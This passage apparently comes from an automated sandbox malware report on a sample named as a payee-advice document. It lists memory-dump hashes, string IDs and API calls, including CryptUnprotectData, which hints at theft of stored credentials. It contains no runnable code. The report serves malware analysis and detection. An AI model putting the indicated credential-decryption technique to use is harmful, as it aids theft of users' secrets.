• Instruction Fuzzy Hash: B481C874E00258CFDB18DFA9D884A9DBBF2BF89300F14C069E419AB365DB749985CF51
Strings
Memory Dump Source
• Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PEY7
                                                                                                                                          • API String ID: 0-1339874439
                                                                                                                                          • Opcode ID: 65a94bebb3a5dd69bc022cd33878575f727232e77f9403086c89c3f3cefec103
                                                                                                                                          • Instruction ID: 58483b1bf80c7e23a32b42b7f8b0094978b42bd5c9b8872c21b46fb1bf1f3128
                                                                                                                                          • Opcode Fuzzy Hash: 65a94bebb3a5dd69bc022cd33878575f727232e77f9403086c89c3f3cefec103
                                                                                                                                          • Instruction Fuzzy Hash: D7825C74E012299FDB64DF69CD94BDDBBB2BB89300F1081EAA44DA7261DB315E81CF41
                                                                                                                                          APIs
                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3A778F5D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                          • Opcode ID: 691a4a98fdb28d41082204823e2942949bba03312f437ad440b49d565e910872
                                                                                                                                          • Instruction ID: 39b791b6ada7a0c22239af23ef401a663ac925e9b3bf58f4a222527e6e45f9e2
                                                                                                                                          • Opcode Fuzzy Hash: 691a4a98fdb28d41082204823e2942949bba03312f437ad440b49d565e910872
                                                                                                                                          • Instruction Fuzzy Hash: CD2156B6800249DFCB10CF99D545BEEBFF5EF88320F14841AE519A7210C33AA594DFA1
                                                                                                                                          APIs
                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3A778F5D
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                          • Opcode ID: 1adf749b9cedd857efeb9c2bcd1d962faf390e12528e3896262e991c8def2177
                                                                                                                                          • Instruction ID: 2c93ea2bc4c1a0d6f29bfd377420914e083e954dd3ddb4af1451e6d4f013b456
                                                                                                                                          • Opcode Fuzzy Hash: 1adf749b9cedd857efeb9c2bcd1d962faf390e12528e3896262e991c8def2177
                                                                                                                                          • Instruction Fuzzy Hash: 0E1159B28003499FDB10CF99C545BEEBFF5EF48320F148459E518A7210C375A594DFA5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8dbcfa333e781573af12781ebe7545b169b0e34a76f41e3b863916ebe3e662f8
                                                                                                                                          • Instruction ID: 948fde1f2277a97a11e5a730df667265492f221032a8bc4bf49c5967cca5dad2
                                                                                                                                          • Opcode Fuzzy Hash: 8dbcfa333e781573af12781ebe7545b169b0e34a76f41e3b863916ebe3e662f8
                                                                                                                                          • Instruction Fuzzy Hash: 76225C74E00218CFDB14DFA8C880B9DBBB2BF88304F5185AAD449AB395DB319D85CF91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b8e1654cf16719ddfdfa590d87f58ac47db3e1d57245addf3da7f4a5c84abf15
                                                                                                                                          • Instruction ID: aa2b3918407890b7baba45c376dba4a16c7cf76cad7fb752126d9e93c4e2ef53
                                                                                                                                          • Opcode Fuzzy Hash: b8e1654cf16719ddfdfa590d87f58ac47db3e1d57245addf3da7f4a5c84abf15
                                                                                                                                          • Instruction Fuzzy Hash: D5E1AF74E01218CFDB64DFA9C984B9DBBB2BF89304F2080AAD409BB351DB355A85CF15
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f5d0ded307782fc8840d3a17f609e9ea45efcf26a9d91145371883f5bc12b759
                                                                                                                                          • Instruction ID: b7f904bc01ca67d506dc0b2daacb06976de23509afd9c389b1cb4b7d02d8d6b6
                                                                                                                                          • Opcode Fuzzy Hash: f5d0ded307782fc8840d3a17f609e9ea45efcf26a9d91145371883f5bc12b759
                                                                                                                                          • Instruction Fuzzy Hash: 9BE1A274E11218CFEB54DFA5C984B9DBBB2BF89304F2081AAD409BB391DB355A85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 44f4661f86bc0d473ceaf67d47790c2ced2c0132487831026a71ad7e4c647f3b
                                                                                                                                          • Instruction ID: 7531b58edaab521a875ffc8a0e66564fec7606279c34d7c1b9e3337f83fe7c11
                                                                                                                                          • Opcode Fuzzy Hash: 44f4661f86bc0d473ceaf67d47790c2ced2c0132487831026a71ad7e4c647f3b
                                                                                                                                          • Instruction Fuzzy Hash: 1ED19074E013288FDB64DFA5C994B9DBBB2BF89300F2081A9D419AB354DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 75bf42016a166d5f87ee48d47c24fbe3a729267beb5abaf649f4f52ec242e9ec
                                                                                                                                          • Instruction ID: 434ba0edd2ff61a2f9a1022ec4c4e44562cd74f5844227738077c394411da379
                                                                                                                                          • Opcode Fuzzy Hash: 75bf42016a166d5f87ee48d47c24fbe3a729267beb5abaf649f4f52ec242e9ec
                                                                                                                                          • Instruction Fuzzy Hash: 67D18E74E012288FDB54DFA5C994B9DBBB2BF89300F2081AAD409AB354DB359E85CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ce473154f9c1193cb7e33106445ed4c2d5011a0c482ccd11d307357713ee4f92
                                                                                                                                          • Instruction ID: ec357bcb621c20b43b26700f6bd467e4191daa4fdaaf516b0545ce39eff378b2
                                                                                                                                          • Opcode Fuzzy Hash: ce473154f9c1193cb7e33106445ed4c2d5011a0c482ccd11d307357713ee4f92
                                                                                                                                          • Instruction Fuzzy Hash: 94D1A178E11218CFDB54DFA9C994B9DBBB2BF89300F2080A9D809AB355DB315D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353490212.000000003A770000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A770000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a770000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 06b87edb82169e712077ce1838809e7e502ece033e4f5a25d592faf83278f256
                                                                                                                                          • Instruction ID: 4b38df012983d5c1f9ee4c5df61b7265a028fc87a88bc543ca48324780be0da1
                                                                                                                                          • Opcode Fuzzy Hash: 06b87edb82169e712077ce1838809e7e502ece033e4f5a25d592faf83278f256
                                                                                                                                          • Instruction Fuzzy Hash: 8FD1A078E10218CFDB54DFA9C994B9DBBB2BF89300F2080A9D809AB355DB355D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b44e782a0dbb8b09e4a8fc3ab7a0c6f2b0f41996e46966c239f6e40a64a34f0d
                                                                                                                                          • Instruction ID: 2538ab923bef275f35e699479f328ef6190875b9d4b8e2ff6a0929b35baf691e
                                                                                                                                          • Opcode Fuzzy Hash: b44e782a0dbb8b09e4a8fc3ab7a0c6f2b0f41996e46966c239f6e40a64a34f0d
                                                                                                                                          • Instruction Fuzzy Hash: ABC1B178E11218CFDB54DFA5C944B9DBBB2BF88304F1080AAD809AB355DB355E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1036ecdceb61af0364349d4feddffed0483cd0f76fbf3c8c6bec6b7142bd92cd
                                                                                                                                          • Instruction ID: 35a691c1f6e337a0d24ef1d4cf19db1adef6236d3747b4c17cab7f7278178e9a
                                                                                                                                          • Opcode Fuzzy Hash: 1036ecdceb61af0364349d4feddffed0483cd0f76fbf3c8c6bec6b7142bd92cd
                                                                                                                                          • Instruction Fuzzy Hash: A2C1A274E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Opcode Fuzzy Hash: c9a6cb0f550d09af7116f4154cbfaf586f7a2e84003e21c3e5a0321980dd24e4
                                                                                                                                          • Instruction Fuzzy Hash: FB519574E10208DFDB18DFAAD884A9DBBF2BF89300F24C129E819AB365DB345951CF54
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6df24d26f1a543af84d58651c2d7bfde265390cccdee4c9356595e8bda798667
                                                                                                                                          • Instruction ID: cd74564ab0c362de82b5e3ba8de6c6ea5ec35b0944647d12111d5997ee452535
                                                                                                                                          • Opcode Fuzzy Hash: 6df24d26f1a543af84d58651c2d7bfde265390cccdee4c9356595e8bda798667
                                                                                                                                          • Instruction Fuzzy Hash: EB517B75D042488FDB24CFAAD9A06DDBBB3BF89304F14906AC454AB215DB39A94ACF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fdc45b05449d507e810ddc0c7a28760ffd97dfe205162ffeab8db9dd9bc679e6
                                                                                                                                          • Instruction ID: acd9515efad1a0afa3305ac11e63b97a2e3ab82c580eb34518a0b53db55b2fa2
                                                                                                                                          • Opcode Fuzzy Hash: fdc45b05449d507e810ddc0c7a28760ffd97dfe205162ffeab8db9dd9bc679e6
                                                                                                                                          • Instruction Fuzzy Hash: A1411B74D012588BEB24CFAAD9A469DBBB3BF89304F14D06AC419BB354DB35994ACF40
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ea1be1728722717fdc8824b59a94d1d3973882b5f39400849009ab00ff8b0d60
                                                                                                                                          • Instruction ID: f03d8e94ff3e12775aaf1990defb5d3e905444921f6c1e197376a41cd0ae2e67
                                                                                                                                          • Opcode Fuzzy Hash: ea1be1728722717fdc8824b59a94d1d3973882b5f39400849009ab00ff8b0d60
                                                                                                                                          • Instruction Fuzzy Hash: 7D41F4B0E002188BEB18DFAAC8447DDBBF2BF89304F14C16AC419BB294DB35594ACF14
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e8a5f00ad68e9efd6f5b29692ac24a3c227d95277ce8f67122e1df7ff2546c22
                                                                                                                                          • Instruction ID: 65dc324598ec7fb1dc34c0a829019a7f8ac44250edc1ba4b7c6152ebad6199d4
                                                                                                                                          • Opcode Fuzzy Hash: e8a5f00ad68e9efd6f5b29692ac24a3c227d95277ce8f67122e1df7ff2546c22
                                                                                                                                          • Instruction Fuzzy Hash: 6A416971E016189BEB58CF6BC94479EFAF3AFC9304F14C1AAC40CA6264EB751A85CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84ca72c980d2ba16840638f9b3bf56e02c270803037ea3bcea6beb6211e21b43
                                                                                                                                          • Instruction ID: cf218533518f4b283509afcc4f9fa08f3891e12c6acf93b60097f890c9757603
                                                                                                                                          • Opcode Fuzzy Hash: 84ca72c980d2ba16840638f9b3bf56e02c270803037ea3bcea6beb6211e21b43
                                                                                                                                          • Instruction Fuzzy Hash: 4E410570E042188FDB08DFAAD8946DDBBF2BF89300F24D02AD458BB254EB345946CF41
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 39d8ce8f863f0e0b6c58862c87d07e16aa5194edc9bd55cb53ed12a95761cb7c
                                                                                                                                          • Instruction ID: 6780d9c2ad500c355775849494e9c1f7f89497e86493c818901155ee1898d8c1
                                                                                                                                          • Opcode Fuzzy Hash: 39d8ce8f863f0e0b6c58862c87d07e16aa5194edc9bd55cb53ed12a95761cb7c
                                                                                                                                          • Instruction Fuzzy Hash: CA41F274D01648CFEB18DFAAC9546EDBBB2BF89300F20C12AD419AB364DB355946CF40
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 12ee1aa6e6e675e7607ff8d91034c92e70001e04d7e001986432e668740ad467
                                                                                                                                          • Instruction ID: 4a5d656d3749fc2e8114928ad261b12888fa16aec95e84e7f1ca9b57e3ee1f7b
                                                                                                                                          • Opcode Fuzzy Hash: 12ee1aa6e6e675e7607ff8d91034c92e70001e04d7e001986432e668740ad467
                                                                                                                                          • Instruction Fuzzy Hash: A541C271D01248CBEB08DFEAD94469DBBF2AF89300F20D12AC419BB255DB355945CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 30eecc464347e80af53f23295083512cbff0334a6dfdf2d27887036660e9bcf6
                                                                                                                                          • Instruction ID: efaf6d3bca2274a64228bd47bc8fa0f7803b2b340690f88fe2d046fe88391052
                                                                                                                                          • Opcode Fuzzy Hash: 30eecc464347e80af53f23295083512cbff0334a6dfdf2d27887036660e9bcf6
                                                                                                                                          • Instruction Fuzzy Hash: 1141D274E01248CBEB18DFAAD9546DDFBF2AF89300F20D12AC419BB255DB355946CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 35a0d1b5d53e83f43022369f5c4fcc6de76a8c8a056ea87a8af7bbc9d93b924e
                                                                                                                                          • Instruction ID: 703a38e4e05c732b61601772e9bd5c26c4334085f7afc4be70bb2d35144437b0
                                                                                                                                          • Opcode Fuzzy Hash: 35a0d1b5d53e83f43022369f5c4fcc6de76a8c8a056ea87a8af7bbc9d93b924e
                                                                                                                                          • Instruction Fuzzy Hash: 7131D270E01608CBEB08CFAAC5546DDFBB2AF89300F21D12AC419BB255EB355946CF40

                                                                                                                                          Control-flow Graph
                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          [Rendered control-flow graph not reproduced in text. Basic blocks span 0x1676f1 to 0x167c85; outgoing calls to 0x167538 (twice), 0x1680d8 and 0x1663e0.]
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                          • API String ID: 0-1435242062
                                                                                                                                          • Opcode ID: 6aaa1687f70607c67b1625478deb09547182abdce34c6719bb1caeab3ad4a609
                                                                                                                                          • Instruction ID: 9331622d72e6b5f2643a6d0c2790827b90766f26f7100cecd8dbb58ef87c6ac0
                                                                                                                                          • Opcode Fuzzy Hash: 6aaa1687f70607c67b1625478deb09547182abdce34c6719bb1caeab3ad4a609
                                                                                                                                          • Instruction Fuzzy Hash: 5C125B30A04609CFCB15CF68C894AAEBBF2FF49318F258599E855DB2A1D730ED51CB90

                                                                                                                                          Control-flow Graph
                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          [Rendered control-flow graph not reproduced in text. Basic blocks span 0x39ef3a50 to 0x39ef3e78; outgoing calls to 0x39ef3fe8, 0x39ef4088 and 0x39ef3fd7.]
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $Haq$Haq$Haq$x4n9$x4n9
                                                                                                                                          • API String ID: 0-3301092701
                                                                                                                                          • Opcode ID: 7d681777ef10f74ade8a9c6301d5ee1a056a695d4ce98858f3f877ffcfc944ea
                                                                                                                                          • Instruction ID: 98ec93ec58a27f654769e94a489841168add69afd1ae8f94d717d3170d682041
                                                                                                                                          • Opcode Fuzzy Hash: 7d681777ef10f74ade8a9c6301d5ee1a056a695d4ce98858f3f877ffcfc944ea
                                                                                                                                          • Instruction Fuzzy Hash: 3AA1EF34B002449FDB15AF38986566E3BA6EFC53A4B21462AE413CB3D1CF369D41CBA1

                                                                                                                                          Control-flow Graph
                                                                                                                                          (graph rendering omitted; function entry 39ef3fe8, basic blocks through 39ef44cd, calls 39ef3f90, 39ef3fe8, 39ef4088, 39ef3fd7, 39ef4385, 39ef4351 and 39ef44cf)
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 8bq$Haq$Haq$Haq$TJbq
                                                                                                                                          • API String ID: 0-1597716666
                                                                                                                                          • Opcode ID: 505137aa2e37902d6d7298dfcc337eef96a126340c73d4deb2ea945045cb5059
                                                                                                                                          • Instruction ID: 4fdcc6bfb33522f7a4c2a99c8372b3515a1a32702c50105423e777061c2ab49d
                                                                                                                                          • Opcode Fuzzy Hash: 505137aa2e37902d6d7298dfcc337eef96a126340c73d4deb2ea945045cb5059
                                                                                                                                          • Instruction Fuzzy Hash: 4ED11535B082448FD705DB68C894AAD7BB2FFC9320F25416AE506DB3A1DB31ED81CB91

                                                                                                                                          Control-flow Graph
                                                                                                                                          (graph rendering omitted; function entry 3a99b42a, basic blocks through 3a99b605, calls 3a99b609 plus the KERNEL32 APIs listed below)
                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A99B4B6
                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 3A99B4F3
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A99B530
                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 3A99B589
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                          • Opcode ID: 7174bc464c88ebec1e455478c37fe149d4fb5aa5a3e458106ef19bf405937340
                                                                                                                                          • Instruction ID: 1826be207f24cf416748a50fe48ac686815026b6b184ee05c916608947c97910
                                                                                                                                          • Opcode Fuzzy Hash: 7174bc464c88ebec1e455478c37fe149d4fb5aa5a3e458106ef19bf405937340
                                                                                                                                          • Instruction Fuzzy Hash: 035166B09003499FDB01CFA9D548BEEBFF1AF89310F20849DE459B7251DB396981CB66

                                                                                                                                          Control-flow Graph
                                                                                                                                          (graph rendering omitted; function entry 3a99b438, basic blocks through 3a99b605, calls 3a99b609 plus the KERNEL32 APIs listed below)
                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A99B4B6
                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 3A99B4F3
                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 3A99B530
                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 3A99B589
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353733702.000000003A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A990000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a990000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                          • Opcode ID: 73d0ca9b2d6be3ef75a51154e85d4b9b1dc51b990ff1a20ee1b4d73633de0ba3
                                                                                                                                          • Instruction ID: d73842c80fc12c699bcdeae648b819860d5c5c4830fd0956a3ab7b2e2d3590cd
                                                                                                                                          • Opcode Fuzzy Hash: 73d0ca9b2d6be3ef75a51154e85d4b9b1dc51b990ff1a20ee1b4d73633de0ba3
                                                                                                                                          • Instruction Fuzzy Hash: 395133B59003099FDB04DFA9D548BEEBFF5AF88310F20845DE419B7250DB39A981CB66
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Haq$Haq
                                                                                                                                          • API String ID: 0-4016896955
                                                                                                                                          • Opcode ID: 11fa73655926fa92400cf1244b62444bad865d207ef93bdc9d27e8b0521bbeb7
                                                                                                                                          • Instruction ID: 7db8399ff6b793e442ff90d48ac3d57ef7f6e21f93cb00a111a722b20c558ca6
                                                                                                                                          • Opcode Fuzzy Hash: 11fa73655926fa92400cf1244b62444bad865d207ef93bdc9d27e8b0521bbeb7
                                                                                                                                          • Instruction Fuzzy Hash: 14B1C0307042158FCB199F79CC64A7A7BA2AFC9300F15856AE446CB3A2DB34CD92D791
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
